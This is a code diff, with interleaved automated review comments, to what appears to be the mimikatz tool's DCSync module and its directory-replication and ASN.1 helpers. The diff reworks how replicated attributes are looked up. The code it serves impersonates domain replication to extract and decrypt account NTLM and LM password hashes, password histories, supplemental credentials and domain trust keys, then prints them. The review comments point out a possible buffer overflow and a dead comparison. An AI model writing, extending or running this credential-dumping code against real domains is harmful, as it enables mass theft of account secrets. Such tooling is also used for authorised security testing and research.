attribut = &attributes->pAttr[i];
if(attribut->attrTyp == type)
{
if(attribut->AttrVal.valCount == 1)
{
ptr = attribut->AttrVal.pAVal[0].pVal;
if(data)
*(PVOID *)data = ptr;
if(size)
*size = attribut->AttrVal.pAVal[0].valLen;
}
break;
}
}
return ptr;
}
void kuhl_m_lsadump_dcsync_findPrintMonoAttr(LPCWSTR prefix, ATTRBLOCK *attributes, ATTRTYP type, BOOL newLine)
{
PVOID ptr;
DWORD sz;
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, type, &ptr, &sz))
kprintf(L"%s%.*s%s", prefix ? prefix : L"", sz / sizeof(wchar_t), (PWSTR) ptr, newLine ? L"\n" : L"");
}
BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWORD rid, LPCWSTR prefix, BOOL isHistory)
{
DWORD i;
@ -1828,14 +1809,14 @@ BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWO
return status;
}
void kuhl_m_lsadump_dcsync_descrObject(ATTRBLOCK *attributes, LPCWSTR szSrcDomain)
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain)
{
kuhl_m_lsadump_dcsync_findPrintMonoAttr(L"\nObject RDN : ", attributes, ATT_RDN, TRUE);
kull_m_rpc_drsr_findPrintMonoAttr(L"\nObject RDN : ", prefixTable, attributes, szOID_ANSI_name, TRUE);
kprintf(L"\n");
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_SAM_ACCOUNT_NAME, NULL, NULL))
kuhl_m_lsadump_dcsync_descrUser(attributes);
else if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_TRUST_PARTNER, NULL, NULL))
kuhl_m_lsadump_dcsync_descrTrust(attributes, szSrcDomain);
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_sAMAccountName, NULL, NULL))
kuhl_m_lsadump_dcsync_descrUser(prefixTable, attributes);
else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_trustPartner, NULL, NULL))
kuhl_m_lsadump_dcsync_descrTrust(prefixTable, attributes, szSrcDomain);
}
const wchar_t * KUHL_M_LSADUMP_UF_FLAG[] = {
@ -1886,21 +1867,22 @@ LPCWSTR kuhl_m_lsadump_samAccountType_toString(DWORD accountType)
return target;
}
void kuhl_m_lsadump_dcsync_descrUser(ATTRBLOCK *attributes)
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes)
{
DWORD rid = 0, i;
PBYTE encodedData;
DWORD encodedDataSize;
PVOID data;
ATTRVALBLOCK *sids;
kprintf(L"** SAM ACCOUNT **\n\n");
kuhl_m_lsadump_dcsync_findPrintMonoAttr(L"SAM Username : ", attributes, ATT_SAM_ACCOUNT_NAME, TRUE);
kuhl_m_lsadump_dcsync_findPrintMonoAttr(L"User Principal Name : ", attributes, ATT_USER_PRINCIPAL_NAME, TRUE);
kull_m_rpc_drsr_findPrintMonoAttr(L"SAM Username : ", prefixTable, attributes, szOID_ANSI_sAMAccountName, TRUE);
kull_m_rpc_drsr_findPrintMonoAttr(L"User Principal Name : ", prefixTable, attributes, szOID_ANSI_userPrincipalName, TRUE);
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_SAM_ACCOUNT_TYPE, &data, NULL))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_sAMAccountType, &data, NULL))
kprintf(L"Account Type : %08x ( %s )\n", *(PDWORD) data, kuhl_m_lsadump_samAccountType_toString(*(PDWORD) data));
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_USER_ACCOUNT_CONTROL, &data, NULL))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_userAccountControl, &data, NULL))
{
kprintf(L"User Account Control : %08x ( ", *(PDWORD) data);
for(i = 0; i < min(ARRAYSIZE(KUHL_M_LSADUMP_UF_FLAG), sizeof(DWORD) * 8); i++)
@ -1909,21 +1891,32 @@ void kuhl_m_lsadump_dcsync_descrUser(ATTRBLOCK *attributes)
kprintf(L")\n");
}
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_ACCOUNT_EXPIRES, &data, NULL))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_accountExpires, &data, NULL))
{
kprintf(L"Account expiration : ");
kull_m_string_displayLocalFileTime((LPFILETIME) data);
kprintf(L"\n");
}
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_PWD_LAST_SET, &data, NULL))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_pwdLastSet, &data, NULL))
{
kprintf(L"Password last change : ");
kull_m_string_displayLocalFileTime((LPFILETIME) data);
kprintf(L"\n");
}
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_OBJECT_SID, &data, NULL))
if(sids = kull_m_rpc_drsr_findAttr(prefixTable, attributes, szOID_ANSI_sIDHistory))
{
kprintf(L"SID history:\n");
for(i = 0; i < sids->valCount; i++)
{
kprintf(L" ");
kull_m_string_displaySID(sids->pAVal[i].pVal);
kprintf(L"\n");
}
}
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_objectSid, &data, NULL))
{
kprintf(L"Object Security ID : ");
kull_m_string_displaySID(data);
@ -1932,17 +1925,17 @@ void kuhl_m_lsadump_dcsync_descrUser(ATTRBLOCK *attributes)
kprintf(L"Object Relative ID : %u\n", rid);
kprintf(L"\nCredentials:\n");
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_UNICODE_PWD, &encodedData, &encodedDataSize))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_unicodePwd, &encodedData, &encodedDataSize))
kuhl_m_lsadump_dcsync_decrypt(encodedData, encodedDataSize, rid, L"NTLM", FALSE);
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_NT_PWD_HISTORY, &encodedData, &encodedDataSize))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_ntPwdHistory, &encodedData, &encodedDataSize))
kuhl_m_lsadump_dcsync_decrypt(encodedData, encodedDataSize, rid, L"ntlm", TRUE);
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_DBCS_PWD, &encodedData, &encodedDataSize))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_dBCSPwd, &encodedData, &encodedDataSize))
kuhl_m_lsadump_dcsync_decrypt(encodedData, encodedDataSize, rid, L"LM ", FALSE);
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_LM_PWD_HISTORY, &encodedData, &encodedDataSize))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_lmPwdHistory, &encodedData, &encodedDataSize))
kuhl_m_lsadump_dcsync_decrypt(encodedData, encodedDataSize, rid, L"lm ", TRUE);
}
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_SUPPLEMENTAL_CREDENTIALS, &encodedData, &encodedDataSize))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_supplementalCredentials, &encodedData, &encodedDataSize))
{
kprintf(L"\nSupplemental Credentials:\n");
kuhl_m_lsadump_dcsync_descrUserProperties((PUSER_PROPERTIES) encodedData);
@ -2036,7 +2029,7 @@ void kuhl_m_lsadump_dcsync_descrUserProperties(PUSER_PROPERTIES properties)
}
}
void kuhl_m_lsadump_dcsync_descrTrust(ATTRBLOCK *attributes, LPCWSTR szSrcDomain)
void kuhl_m_lsadump_dcsync_descrTrust(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain)
{
PBYTE encodedData;
DWORD encodedDataSize;
@ -2044,7 +2037,7 @@ void kuhl_m_lsadump_dcsync_descrTrust(ATTRBLOCK *attributes, LPCWSTR szSrcDomain
kprintf(L"** TRUSTED DOMAIN - Antisocial **\n\n");
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_TRUST_PARTNER, &encodedData, &encodedDataSize))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_trustPartner, &encodedData, &encodedDataSize))
{
uPartner.Length = uPartner.MaximumLength = (USHORT) encodedDataSize;
uPartner.Buffer = (PWSTR) encodedData;
@ -2054,8 +2047,8 @@ void kuhl_m_lsadump_dcsync_descrTrust(ATTRBLOCK *attributes, LPCWSTR szSrcDomain
RtlInitUnicodeString(&uDomain, szSrcDomain);
if(NT_SUCCESS(RtlUpcaseUnicodeString(&uUpcaseDomain, &uDomain, TRUE)))
{
kuhl_m_lsadump_dcsync_descrTrustAuthentication(attributes, ATT_TRUST_AUTH_INCOMING, &uUpcaseDomain, &uUpcasePartner);
kuhl_m_lsadump_dcsync_descrTrustAuthentication(attributes, ATT_TRUST_AUTH_OUTGOING, &uUpcaseDomain, &uUpcasePartner);
kuhl_m_lsadump_dcsync_descrTrustAuthentication(prefixTable, attributes, &uUpcaseDomain, &uUpcasePartner, TRUE);
kuhl_m_lsadump_dcsync_descrTrustAuthentication(prefixTable, attributes, &uUpcaseDomain, &uUpcasePartner, FALSE);
RtlFreeUnicodeString(&uUpcaseDomain);
}
RtlFreeUnicodeString(&uUpcasePartner);
@ -2063,7 +2056,7 @@ void kuhl_m_lsadump_dcsync_descrTrust(ATTRBLOCK *attributes, LPCWSTR szSrcDomain
}
}
void kuhl_m_lsadump_dcsync_descrTrustAuthentication(ATTRBLOCK *attributes, ATTRTYP type, PCUNICODE_STRING domain, PCUNICODE_STRING partner)
void kuhl_m_lsadump_dcsync_descrTrustAuthentication(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, PCUNICODE_STRING domain, PCUNICODE_STRING partner, BOOL isIn)
{
PBYTE encodedData;
DWORD encodedDataSize;
@ -2071,9 +2064,9 @@ void kuhl_m_lsadump_dcsync_descrTrustAuthentication(ATTRBLOCK *attributes, ATTRT
LPCWSTR prefix, prefixOld;
PCUNICODE_STRING from, dest;
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, type, &encodedData, &encodedDataSize))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, isIn ? szOID_ANSI_trustAuthIncoming : szOID_ANSI_trustAuthOutgoing, &encodedData, &encodedDataSize))
{
if(type == ATT_TRUST_AUTH_INCOMING)
if(isIn)
{
prefix = L" In ";
prefixOld = L" In-1";


@ -420,15 +420,12 @@ PKERB_KEY_DATA kuhl_m_lsadump_lsa_keyDataInfo(PVOID base, PKERB_KEY_DATA keys, U
PKERB_KEY_DATA_NEW kuhl_m_lsadump_lsa_keyDataNewInfo(PVOID base, PKERB_KEY_DATA_NEW keys, USHORT Count, PCWSTR title);
void kuhl_m_lsadump_lsa_DescrBuffer(DWORD type, PVOID Buffer, DWORD BufferSize);
PVOID kuhl_m_lsadump_dcsync_findMonoAttr(ATTRBLOCK *attributes, ATTRTYP type, PVOID data, DWORD *size);
void kuhl_m_lsadump_dcsync_findPrintMonoAttr(LPCWSTR prefix, ATTRBLOCK *attributes, ATTRTYP type, BOOL newLine);
BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWORD rid, LPCWSTR prefix, BOOL isHistory);
void kuhl_m_lsadump_dcsync_descrObject(ATTRBLOCK *attributes, LPCWSTR szSrcDomain);
void kuhl_m_lsadump_dcsync_descrUser(ATTRBLOCK *attributes);
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain);
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes);
void kuhl_m_lsadump_dcsync_descrUserProperties(PUSER_PROPERTIES properties);
void kuhl_m_lsadump_dcsync_descrTrust(ATTRBLOCK *attributes, LPCWSTR szSrcDomain);
void kuhl_m_lsadump_dcsync_descrTrustAuthentication(ATTRBLOCK *attributes, ATTRTYP type, PCUNICODE_STRING domain, PCUNICODE_STRING partner);
void kuhl_m_lsadump_dcsync_descrTrust(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain);
void kuhl_m_lsadump_dcsync_descrTrustAuthentication(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, PCUNICODE_STRING domain, PCUNICODE_STRING partner, BOOL isIn);
typedef wchar_t * LOGONSRV_HANDLE;
typedef struct _NETLOGON_CREDENTIAL {


@ -5,6 +5,10 @@
*/
#include "kull_m_asn1.h"
ASN1module_t hASN1Module = NULL;
ASN1encoding_t ASN1enc = NULL;
ASN1decoding_t ASN1dec = NULL;
void kull_m_asn1_BitStringFromULONG(BerElement * pBer, ULONG data)
{
BYTE flagBuffer[5] = {0};
@ -29,4 +33,90 @@ void kull_m_asn1_GenString(BerElement * pBer, PCUNICODE_STRING String)
ber_printf(pBer, "to", DIRTY_ASN1_ID_GENERAL_STRING, aString.Buffer, aString.Length);
RtlFreeAnsiString(&aString);
}
}
static const ASN1GenericFun_t kull_m_asn1_encdecfreefntab[] = {NULL};
static const ASN1uint32_t kull_m_asn1_sizetab[] = {0};
BOOL kull_m_asn1_init()
{
BOOL status = FALSE;
int ret;
if(hASN1Module = ASN1_CreateModule(ASN1_THIS_VERSION, ASN1_BER_RULE_DER, ASN1FLAGS_NOASSERT, 1, kull_m_asn1_encdecfreefntab, kull_m_asn1_encdecfreefntab, (const ASN1FreeFun_t *) kull_m_asn1_encdecfreefntab, kull_m_asn1_sizetab, 'iwik'))
{
ret = ASN1_CreateEncoder(hASN1Module, &ASN1enc, NULL, 0, NULL);
if(ASN1_FAILED(ret))
{
PRINT_ERROR(L"ASN1_CreateEncoder: %i\n", ret);
ASN1enc = NULL;
}
else
{
ret = ASN1_CreateDecoder(hASN1Module, &ASN1dec, NULL, 0, NULL);
if(ASN1_FAILED(ret))
{
PRINT_ERROR(L"ASN1_CreateDecoder: %i\n", ret);
ASN1dec = NULL;
}
}
}
else PRINT_ERROR(L"ASN1_CreateModule\n");
status = hASN1Module && ASN1enc && ASN1dec;
if(!status)
kull_m_asn1_term();
return status;
}
void kull_m_asn1_term()
{
if(ASN1dec)
{
ASN1_CloseDecoder(ASN1dec);
ASN1dec = NULL;
}
if(ASN1enc)
{
ASN1_CloseEncoder(ASN1enc);
ASN1enc = NULL;
}
if(hASN1Module)
{
ASN1_CloseModule(hASN1Module);
hASN1Module = NULL;
}
}
BOOL kull_m_asn1_DotVal2Eoid(__in const ASN1char_t *dotOID, __out OssEncodedOID *encodedOID)
{
BOOL status = FALSE;
if(ASN1enc && dotOID && encodedOID)
{
encodedOID->length = 0;
encodedOID->value = NULL;
status = ASN1BERDotVal2Eoid(ASN1enc, dotOID, encodedOID);
}
return status;
}
void kull_m_asn1_freeEnc(void *pBuf)
{
if(ASN1enc && pBuf)
ASN1_FreeEncoded(ASN1enc, pBuf);
}
BOOL kull_m_asn1_Eoid2DotVal(__in const OssEncodedOID *encodedOID, __out ASN1char_t **dotOID)
{
BOOL status = FALSE;
if(ASN1dec && encodedOID && dotOID)
{
*dotOID = NULL;
status = ASN1BEREoid2DotVal(ASN1dec, encodedOID, dotOID);
}
return status;
}
void kull_m_asn1_freeDec(void *pBuf)
{
if(pBuf)
ASN1Free(pBuf);
}
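Review bot: The two new OID wrappers return allocated buffers, but nothing in this file says who releases them or with which routine. `kull_m_asn1_DotVal2Eoid` fills `encodedOID->value`, which `kull_m_rpc_drsr_MakeAttid` releases with `kull_m_asn1_freeEnc`, and judging by the names `*dotOID` from `kull_m_asn1_Eoid2DotVal` is meant for `kull_m_asn1_freeDec`. A one-line comment above each wrapper would prevent a mismatched or missing free, for example `/* on success, release encodedOID->value with kull_m_asn1_freeEnc() */` and `/* on success, release *dotOID with kull_m_asn1_freeDec() */`. `kull_m_asn1_init` also overwrites `hASN1Module`, `ASN1enc` and `ASN1dec` without checking whether they are already set, so a second call would presumably leak the earlier handles; whether it can be called twice is not visible here.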


@ -7,6 +7,7 @@
#include "globals.h"
#include <Winldap.h>
#include <Winber.h>
#include <msasn1.h>
#include "kull_m_string.h"
#define DIRTY_ASN1_ID_BOOLEAN 0x01
@ -27,4 +28,19 @@
void kull_m_asn1_BitStringFromULONG(BerElement * pBer, ULONG data);
void kull_m_asn1_GenTime(BerElement * pBer, PFILETIME localtime);
void kull_m_asn1_GenString(BerElement * pBer, PCUNICODE_STRING String);
void kull_m_asn1_GenString(BerElement * pBer, PCUNICODE_STRING String);
typedef struct {
unsigned short length;
unsigned char *value;
} OssEncodedOID;
extern ASN1_PUBLIC BOOL ASN1API ASN1BERDotVal2Eoid(__in ASN1encoding_t pEncoderInfo, __in const ASN1char_t *dotOID, __out OssEncodedOID *encodedOID);
extern ASN1_PUBLIC BOOL ASN1API ASN1BEREoid2DotVal(__in ASN1decoding_t pDecoderInfo, __in const OssEncodedOID *encodedOID, __out ASN1char_t **dotOID);
BOOL kull_m_asn1_init();
void kull_m_asn1_term();
BOOL kull_m_asn1_DotVal2Eoid(__in const ASN1char_t *dotOID, __out OssEncodedOID *encodedOID);
void kull_m_asn1_freeEnc(void *pBuf);
BOOL kull_m_asn1_Eoid2DotVal(__in const OssEncodedOID *encodedOID, __out ASN1char_t **dotOID);
void kull_m_asn1_freeDec(void *pBuf);
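Review bot: `BOOL kull_m_asn1_init();` and `void kull_m_asn1_term();` are declared with empty parentheses, which in C leaves the parameter list unspecified, so a call with stray arguments compiles without a diagnostic. Declaring them as `BOOL kull_m_asn1_init(void);` and `void kull_m_asn1_term(void);`, with the same change in the definitions, turns them into real prototypes. The `OssEncodedOID` typedef would also benefit from a comment that `length` is only 16 bits wide, since `kull_m_rpc_drsr_OidFromAttid` has to cast a computed size into it.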


@ -185,10 +185,26 @@ BOOL kull_m_rpc_drsr_CrackName(DRS_HANDLE hDrs, DS_NAME_FORMAT NameFormat, LPCWS
return status;
}
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply(REPLENTINFLIST *objects) // very partial, ofc
LPCSTR kull_m_rpc_drsr_encrypted_oids[] = {
szOID_ANSI_unicodePwd, szOID_ANSI_ntPwdHistory, szOID_ANSI_dBCSPwd, szOID_ANSI_lmPwdHistory, szOID_ANSI_supplementalCredentials,
szOID_ANSI_trustAuthIncoming, szOID_ANSI_trustAuthOutgoing,
szOID_ANSI_currentValue,
};
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply(SCHEMA_PREFIX_TABLE *prefixTable, REPLENTINFLIST *objects) // very partial, ofc
{
ATTRTYP attSensitive[ARRAYSIZE(kull_m_rpc_drsr_encrypted_oids)];
REPLENTINFLIST * pReplentinflist, *pNextReplentinflist = objects;
DWORD i, j;
DWORD i, j, k;
for(i = 0; i < ARRAYSIZE(attSensitive); i++)
{
if(!kull_m_rpc_drsr_MakeAttid(prefixTable, kull_m_rpc_drsr_encrypted_oids[i], &attSensitive[i], FALSE))
{
PRINT_ERROR(L"Unable to MakeAttid for %S\n", kull_m_rpc_drsr_encrypted_oids[i]);
return FALSE;
}
}
while(pReplentinflist = pNextReplentinflist)
{
pNextReplentinflist = pReplentinflist->pNextEntInf;
@ -196,26 +212,17 @@ BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply(REPLENTINFLIST *objects) // very p
{
for(i = 0; i < pReplentinflist->Entinf.AttrBlock.attrCount; i++)
{
switch(pReplentinflist->Entinf.AttrBlock.pAttr[i].attrTyp)
for(j = 0; j < ARRAYSIZE(attSensitive); j++)
{
case ATT_CURRENT_VALUE:
case ATT_UNICODE_PWD:
case ATT_NT_PWD_HISTORY:
case ATT_DBCS_PWD:
case ATT_LM_PWD_HISTORY:
case ATT_SUPPLEMENTAL_CREDENTIALS:
case ATT_TRUST_AUTH_INCOMING:
case ATT_TRUST_AUTH_OUTGOING:
// case another :
// case another :
if(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal)
for(j = 0; j < pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.valCount; j++)
if(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal[j].pVal)
if(!kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt(&pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal[j]))
if(attSensitive[j] == pReplentinflist->Entinf.AttrBlock.pAttr[i].attrTyp)
{
if(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal)
for(k = 0; k < pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.valCount; k++)
if(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal[k].pVal)
if(!kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt(&pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal[k]))
return FALSE;
break;
default:
break;
break;
}
}
}
}
@ -356,13 +363,7 @@ void kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data(DWORD dwOutVersion, DRS_MSG_G
MIDL_user_free(reply->V6.pNC);
if(reply->V6.pUpToDateVecSrc)
MIDL_user_free(reply->V6.pUpToDateVecSrc);
if(reply->V6.PrefixTableSrc.pPrefixEntry)
{
for(i = 0; i < reply->V6.PrefixTableSrc.PrefixCount; i++)
if(reply->V6.PrefixTableSrc.pPrefixEntry[i].prefix.elements)
MIDL_user_free(reply->V6.PrefixTableSrc.pPrefixEntry[i].prefix.elements);
MIDL_user_free(reply->V6.PrefixTableSrc.pPrefixEntry);
}
kull_m_rpc_drsr_free_SCHEMA_PREFIX_TABLE_data(&reply->V6.PrefixTableSrc);
pNextReplentinflist = reply->V6.pObjects;
while(pReplentinflist = pNextReplentinflist)
{
@ -412,4 +413,181 @@ void kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data(DWORD dwOutVersion, DRS_MSG_G
break;
}
}
}
void kull_m_rpc_drsr_free_SCHEMA_PREFIX_TABLE_data(SCHEMA_PREFIX_TABLE *prefixTable)
{
DWORD i;
if(prefixTable)
{
if(prefixTable->pPrefixEntry)
{
for(i = 0; i < prefixTable->PrefixCount; i++)
if(prefixTable->pPrefixEntry[i].prefix.elements)
MIDL_user_free(prefixTable->pPrefixEntry[i].prefix.elements);
MIDL_user_free(prefixTable->pPrefixEntry);
}
}
}
LPSTR kull_m_rpc_drsr_OidFromAttid(SCHEMA_PREFIX_TABLE *prefixTable, ATTRTYP type)
{
LPSTR szOid = NULL;
DWORD i;
USHORT low = (USHORT) type, idx = (USHORT) (type >> 16);
OID_t *pLittleOid = NULL;
OssEncodedOID encodedOid;
for(i = 0; i < prefixTable->PrefixCount; i++)
{
if(prefixTable->pPrefixEntry[i].ndx == idx)
{
pLittleOid = &prefixTable->pPrefixEntry[i].prefix;
break;
}
}
if(pLittleOid)
{
encodedOid.length = (USHORT) (pLittleOid->length + ((low < 0x80) ? 1 : 2));
if(encodedOid.value = (PBYTE) LocalAlloc(LPTR, encodedOid.length))
{
RtlCopyMemory(encodedOid.value, pLittleOid->elements, pLittleOid->length);
if(low < 0x80)
encodedOid.value[pLittleOid->length] = (BYTE) low;
else
{
if(low >= 0x8000)
low -= 0x8000;
encodedOid.value[pLittleOid->length] = (BYTE) (((low / 0x80) % 0x80) + 0x80);
encodedOid.value[pLittleOid->length + 1] = (BYTE) (low % 0x80);
}
if(!kull_m_asn1_Eoid2DotVal(&encodedOid, &szOid))
szOid = NULL;
LocalFree(encodedOid.value);
}
}
return szOid;
}
DWORD kull_m_rpc_drsr_MakeAttid_addPrefixToTable(SCHEMA_PREFIX_TABLE *prefixTable, OssEncodedOID *oidPrefix, DWORD *ndx, BOOL toAdd)
{
BOOL status = FALSE;
DWORD i;
PrefixTableEntry *entries;
for(i = 0; i < prefixTable->PrefixCount; i++)
{
if(prefixTable->pPrefixEntry[i].prefix.length == oidPrefix->length)
{
if(RtlEqualMemory(prefixTable->pPrefixEntry[i].prefix.elements, oidPrefix->value, oidPrefix->length))
{
status = TRUE;
*ndx = prefixTable->pPrefixEntry[i].ndx;
break;
}
}
}
if(!status && toAdd)
{
*ndx = prefixTable->PrefixCount;
if(entries = (PrefixTableEntry *) MIDL_user_allocate(sizeof(PrefixTableEntry) * ((*ndx) + 1)))
{
RtlCopyMemory(entries, prefixTable->pPrefixEntry, sizeof(PrefixTableEntry) * (*ndx));
entries[*ndx].ndx = *ndx;
entries[*ndx].prefix.length = oidPrefix->length;
if(entries[*ndx].prefix.elements = (PBYTE) MIDL_user_allocate(oidPrefix->length))
{
RtlCopyMemory(entries[*ndx].prefix.elements, oidPrefix->value, oidPrefix->length);
if(prefixTable->pPrefixEntry)
MIDL_user_free(prefixTable->pPrefixEntry);
prefixTable->pPrefixEntry = entries;
prefixTable->PrefixCount++;
status = TRUE;
}
}
}
return status;
}
BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, ATTRTYP *att, BOOL toAdd)
{
BOOL status = FALSE;
DWORD lastValue, ndx;
PSTR lastValueString;
OssEncodedOID oidPrefix;
if(lastValueString = strrchr(szOid, '.'))
{
if(*(lastValueString + 1))
{
lastValueString++;
lastValue = strtoul(lastValueString, NULL, 0);
*att = (WORD) lastValue % 0x4000;
if(*att >= 0x4000)
*att += 0x8000;
if(kull_m_asn1_DotVal2Eoid(szOid, &oidPrefix))
{
oidPrefix.length -= (lastValue < 0x80) ? 1 : 2;
if(status = kull_m_rpc_drsr_MakeAttid_addPrefixToTable(prefixTable, &oidPrefix, &ndx, toAdd))
*att |= ndx << 16;
else PRINT_ERROR(L"kull_m_rpc_drsr_MakeAttid_addPrefixToTable");
kull_m_asn1_freeEnc(oidPrefix.value);
}
}
}
return status;
}
ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid)
{
ATTRVALBLOCK *ptr = NULL;
DWORD i;
ATTR *attribut;
ATTRTYP type;
if(kull_m_rpc_drsr_MakeAttid(prefixTable, szOid, &type, FALSE))
{
for(i = 0; i < attributes->attrCount; i++)
{
attribut = &attributes->pAttr[i];
if(attribut->attrTyp == type)
{
ptr = &attribut->AttrVal;
break;
}
}
}
else PRINT_ERROR(L"Unable to get an ATTRTYP for %S\n", szOid);
return ptr;
}
PVOID kull_m_rpc_drsr_findMonoAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, PVOID data, DWORD *size)
{
PVOID ptr = NULL;
ATTRVALBLOCK *valblock;
if(data)
*(PVOID *)data = NULL;
if(size)
*size = 0;
if(valblock = kull_m_rpc_drsr_findAttr(prefixTable, attributes, szOid))
{
if(valblock->valCount == 1)
{
ptr = valblock->pAVal[0].pVal;
if(data)
*(PVOID *)data = ptr;
if(size)
*size = valblock->pAVal[0].valLen;
}
}
return ptr;
}
void kull_m_rpc_drsr_findPrintMonoAttr(LPCWSTR prefix, SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, BOOL newLine)
{
PVOID ptr;
DWORD sz;
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOid, &ptr, &sz))
kprintf(L"%s%.*s%s", prefix ? prefix : L"", sz / sizeof(wchar_t), (PWSTR) ptr, newLine ? L"\n" : L"");
}
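Review bot: In `kull_m_rpc_drsr_OidFromAttid` the allocation size is truncated to 16 bits by `encodedOid.length = (USHORT) (pLittleOid->length + ...)`, while the following `RtlCopyMemory` copies the untruncated `pLittleOid->length` bytes. The prefix table presumably comes from the remote reply, so if `OID_t.length` is wider than 16 bits (its definition is outside this view) an oversized prefix would be written past the `LocalAlloc` buffer. Changing the guard to `if(pLittleOid && (pLittleOid->length <= (0xFFFF - 2)))` rejects such an entry before anything is allocated. Separately, in `kull_m_rpc_drsr_MakeAttid` the test `if(*att >= 0x4000)` comes right after `% 0x4000` and can never be true; the comparison was presumably meant to be on `lastValue`.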


@ -7,6 +7,7 @@
#include "../kull_m_crypto_system.h"
#include "../kull_m_crypto.h"
#include "../kull_m_string.h"
#include "../kull_m_asn1.h"
#include "kull_m_rpc_ms-drsr.h"
typedef struct _DRS_EXTENSIONS_INT {
@ -105,6 +106,10 @@ typedef struct _ENCRYPTED_PAYLOAD {
#define DRS_SYNC_PAS 0x40000000
#define DRS_GET_ALL_GROUP_MEMBERSHIP 0x80000000
#define ENTINF_FROM_MASTER 0x00000001
#define ENTINF_DYNAMIC_OBJECT 0x00000002
#define ENTINF_REMOTE_MODIFY 0x00010000
typedef enum {
DS_UNKNOWN_NAME = 0,
DS_FQDN_1779_NAME = 1,
@ -158,48 +163,79 @@ typedef enum {
EXOP_REPL_SECRETS = 7
} EXOP_REQ;
#define ATT_RDN 589825
#define ATT_OBJECT_SID 589970
#define ATT_WHEN_CREATED 131074
#define ATT_WHEN_CHANGED 131075
#define szOID_ANSI_name "1.2.840.113556.1.4.1"
#define ATT_SAM_ACCOUNT_NAME 590045
#define ATT_USER_PRINCIPAL_NAME 590480
#define ATT_SERVICE_PRINCIPAL_NAME 590595
#define ATT_SID_HISTORY 590433
#define ATT_USER_ACCOUNT_CONTROL 589832
#define ATT_SAM_ACCOUNT_TYPE 590126
#define ATT_LOGON_HOURS 589888
#define ATT_LOGON_WORKSTATION 589889
#define ATT_LAST_LOGON 589876
#define ATT_PWD_LAST_SET 589920
#define ATT_ACCOUNT_EXPIRES 589983
#define ATT_LOCKOUT_TIME 590486
